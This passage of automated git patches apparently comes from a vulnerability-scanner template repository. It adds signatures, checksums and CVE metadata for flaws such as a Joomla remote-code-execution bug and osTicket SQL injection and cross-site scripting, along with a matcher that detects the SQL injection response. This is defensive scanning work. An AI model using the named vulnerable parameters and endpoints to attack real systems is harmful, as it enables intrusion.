passive/cves/2024/CVE-2024-40711.yaml | 2 ++ 3 files changed, 6 insertions(+) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 7c3b1157ec..4404dd507c 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -59,3 +59,5 @@ http: - type: status status: - 200 + +# digest: 4a0a004730450220645a73ecc672c551274c35dcb107fa7c7e3d529e0cfbdc411f4e09f03b461770022100f3a8540486513e063effb2cfcafe50c4ed3cfe56a0aa9aa8035a44fc4a54a053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml index 482112ff4b..91fdf36ace 100644 --- a/http/misconfiguration/root-path-disclosure.yaml +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -35,3 +35,5 @@ http: - type: status status: - 200 + +# digest: 4a0a0047304502201df7e689574db38cce538cfc683a70830f20bcc236b208d017ff53f6d2297fab02210087a84eb96e50f50746d6de34558adbe908ef6b5041b9f13dce08327142290850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/passive/cves/2024/CVE-2024-40711.yaml b/passive/cves/2024/CVE-2024-40711.yaml index 8c5f37d8c8..365a1756b9 100644 --- a/passive/cves/2024/CVE-2024-40711.yaml +++ b/passive/cves/2024/CVE-2024-40711.yaml @@ -47,3 +47,5 @@ http: - type: status status: - 200 + +# digest: 4b0a00483046022100c5145705dd3176a41c9abc1702393af9afe77eb8c4ddcca0525f5172a5ce9f7d022100ce14b5f0590cd9fb09507caaa2378089a7701671b0fb1d2d1885eff9d5c11dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 919257ca39e3c826b5fb53ccc23e34027947f0d3 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:01:47 +0000 Subject: [PATCH 122/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3f1bf09136..74e83ba916 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-8562.yaml +http/cves/2021/CVE-2021-45811.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 53e00921adffd0751d0680f1a8411680280d926c Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:01:50 +0000 Subject: [PATCH 123/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 0b007b07d0..1e58cda616 100644 --- a/cves.json +++ b/cves.json @@ -317,6 +317,7 @@ {"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"} {"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"} {"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"} +{"ID":"CVE-2015-8562","Info":{"Name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","Severity":"high","Description":"Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-8562.yaml"} {"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"} {"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"} {"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"} @@ -1501,6 +1502,7 @@ {"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"} {"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"} {"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"} +{"ID":"CVE-2021-45811","Info":{"Name":"osTicket 1.15.x - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-45811.yaml"} {"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"} {"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45968.yaml"} {"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-46005.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index ec4df3c192..2d038cd787 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -799eae8299d198bbf2b788fdf706af03 +ab8bc8adb6058ab153b2f254d271a1cf From 1e6c1b0fbcb653eb8e241b5519e6052585bb74ab Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:03:09 +0000 Subject: [PATCH 124/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 1e58cda616..452a9bfb5f 100644 --- a/cves.json +++ b/cves.json @@ -2022,6 +2022,7 @@ {"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"} {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} {"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"} +{"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} {"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 2d038cd787..753d9e44b7 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -ab8bc8adb6058ab153b2f254d271a1cf +1f5ab9daf40d092045597ad89f7b094a From 2f2de3bb101a4b903ce9416d615fc994fdafaf8c Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:03:15 +0000 Subject: [PATCH 125/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 74e83ba916..ac39602461 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2015/CVE-2015-8562.yaml http/cves/2021/CVE-2021-45811.yaml +http/cves/2023/CVE-2023-1315.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 8e5c464d4d5cf072c1b150438424264f7cc73a0c Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:03:17 +0000 Subject: [PATCH 126/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2488e183c0..274778df08 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:f8872cbec5da5f5fbb3c312cf5865d9eae0a3370 -cves.json-checksum.txt:796a759736dffb34602155821522d3c02a8d3c4b +cves.json:e44488cf2e6c862adbc07543b05487cf2d5e074a +cves.json-checksum.txt:59b1c736b14be46a0146e655103d1f11e5fb149f dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -1537,7 +1537,7 @@ http/cves/2015/CVE-2015-7780.yaml:353b0363275dc05f4d2f6c352a61b80eedc1de43 http/cves/2015/CVE-2015-7823.yaml:037fa0a802e5e6081be7d50f78227d296733ad25 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:a504f142c32f0e890063057088ffb8c3b39c4a74 -http/cves/2015/CVE-2015-8562.yaml:420d51eab73b7d1d3dd7546e565d5bc7938e6938 +http/cves/2015/CVE-2015-8562.yaml:182760cc54a0020b6f6652581c484277365534a8 http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc @@ -2722,6 +2722,7 @@ http/cves/2021/CVE-2021-45380.yaml:f24398df04fa60b12219061f6d11cc69fa9f6df6 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 http/cves/2021/CVE-2021-45422.yaml:2cf95513dc085cd08d0a9217c72c63192320ade9 http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b +http/cves/2021/CVE-2021-45811.yaml:13e6e6c82d54b1fc7def5d2c32c83021c0c1a416 http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 http/cves/2021/CVE-2021-46005.yaml:3b3b7ae4a988dd406432da64978b8a385a76f20d @@ -3241,6 +3242,7 @@ http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 +http/cves/2023/CVE-2023-1315.yaml:47a054680d17ad73df6bcb1ba0870261394b34f6 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a @@ -6416,7 +6418,7 @@ http/misconfiguration/rekognition-image-validation.yaml:320e0300b3a242448eeb3ac6 http/misconfiguration/repetier-unauth.yaml:49e1a9eb30a8a755654e401669d9a39e3c09e3a7 http/misconfiguration/request-baskets-exposure.yaml:02d2c2b167c7281ef3c0e9315f05507f2270c827 http/misconfiguration/rethinkdb-admin-console.yaml:5898dfe2d5c65ff468a51596226569ab87ea6d17 -http/misconfiguration/root-path-disclosure.yaml:7a650fc89c2bb89b16fe8f6ba17b305e1b265333 +http/misconfiguration/root-path-disclosure.yaml:e9a6467ccdcbfaac967f7df1ae6d71a83793caaa http/misconfiguration/roxyfileman-fileupload.yaml:ed5188248f91ec32600369efa8f74eeb68ec3441 http/misconfiguration/s3-torrent.yaml:cb8cf43a0671794f2618c3cadc81a768a775d857 http/misconfiguration/salesforce-aura.yaml:855d650ee81f9e1640873673b7e7aaaf8a1f88f3 @@ -9427,7 +9429,7 @@ network/misconfig/tidb-unauth.yaml:31f8d2286bd7557d53f7ff18011a9ec7732ca117 network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c -passive/cves/2024/CVE-2024-40711.yaml:a6543ec7d54dc5854e96b482d90ed19f84931156 +passive/cves/2024/CVE-2024-40711.yaml:44e07f59b54b5429a09a298df997dd1f4fb58487 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:29a13b0b8f2933e1af3fefddd2d0761b439dc01f profiles/aws-cloud-config.yml:62e4b0c8d93906ff00ab4785b5725f8799101f68 @@ -9475,7 +9477,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b7dfc9dbc6058137bf7794330964392ada678b3f +templates-checksum.txt:d86d45ae46ba471cb4798ec3ba547cb038b69cc7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6aabf9a6f90d41ba90227178c735863de70ee01f Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:03:54 +0000 Subject: [PATCH 127/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ac39602461..74d45756f5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2015/CVE-2015-8562.yaml http/cves/2021/CVE-2021-45811.yaml http/cves/2023/CVE-2023-1315.yaml +http/cves/2023/CVE-2023-1317.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From c479bf32c7f313088b3db6e463396a4a8a1f5b5a Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:03:58 +0000 Subject: [PATCH 128/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 452a9bfb5f..3967dfbd72 100644 --- a/cves.json +++ b/cves.json @@ -2023,6 +2023,7 @@ {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} {"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"} {"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"} +{"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} {"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 753d9e44b7..a7c6ded282 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -1f5ab9daf40d092045597ad89f7b094a +23a1ae5566bbcc02d28fe10be1ff51a2 From 758b3f56aff7ab5a56177c2e160536fa0c1c56be Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:04:00 +0000 Subject: [PATCH 129/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 274778df08..ce57bdaac5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:e44488cf2e6c862adbc07543b05487cf2d5e074a -cves.json-checksum.txt:59b1c736b14be46a0146e655103d1f11e5fb149f +cves.json:e627b588e4bb1b2d47b8a9f321ebee5324705a9f +cves.json-checksum.txt:b72ffc9381578d941cfb058bbe6a3230b71a93e8 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3243,6 +3243,7 @@ http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1315.yaml:47a054680d17ad73df6bcb1ba0870261394b34f6 +http/cves/2023/CVE-2023-1317.yaml:eea86a0c023e1fdfd5e5d7ef2a6a800284012074 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a @@ -9477,7 +9478,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d86d45ae46ba471cb4798ec3ba547cb038b69cc7 +templates-checksum.txt:0117e23b7e70e3c450163d5035c7e8865701c2fc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2266ebcdd12ee7242e530992c26254d1a32fb0de Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:04:47 +0000 Subject: [PATCH 130/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2015/CVE-2015-8562.yaml | 3 +-- http/cves/2021/CVE-2021-45811.yaml | 2 ++ http/cves/2023/CVE-2023-1315.yaml | 2 ++ http/misconfiguration/root-path-disclosure.yaml | 3 +-- passive/cves/2024/CVE-2024-40711.yaml | 3 +-- 5 files changed, 7 insertions(+), 6 deletions(-) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 4404dd507c..0f9c2e5d3c 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220645a73ecc672c551274c35dcb107fa7c7e3d529e0cfbdc411f4e09f03b461770022100f3a8540486513e063effb2cfcafe50c4ed3cfe56a0aa9aa8035a44fc4a54a053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9d585daa1c154a8a02cc56a9950cd6acf63af5aadea9ee9343e00847d05bf77022100a3f090d371c718e2cdb376477d31caa13c53141325dddb998a2722d21cb4248b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45811.yaml b/http/cves/2021/CVE-2021-45811.yaml index 2743737d6a..c64bf5da59 100644 --- a/http/cves/2021/CVE-2021-45811.yaml +++ b/http/cves/2021/CVE-2021-45811.yaml @@ -65,3 +65,5 @@ http: - type: dsl dsl: - contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance") + +# digest: 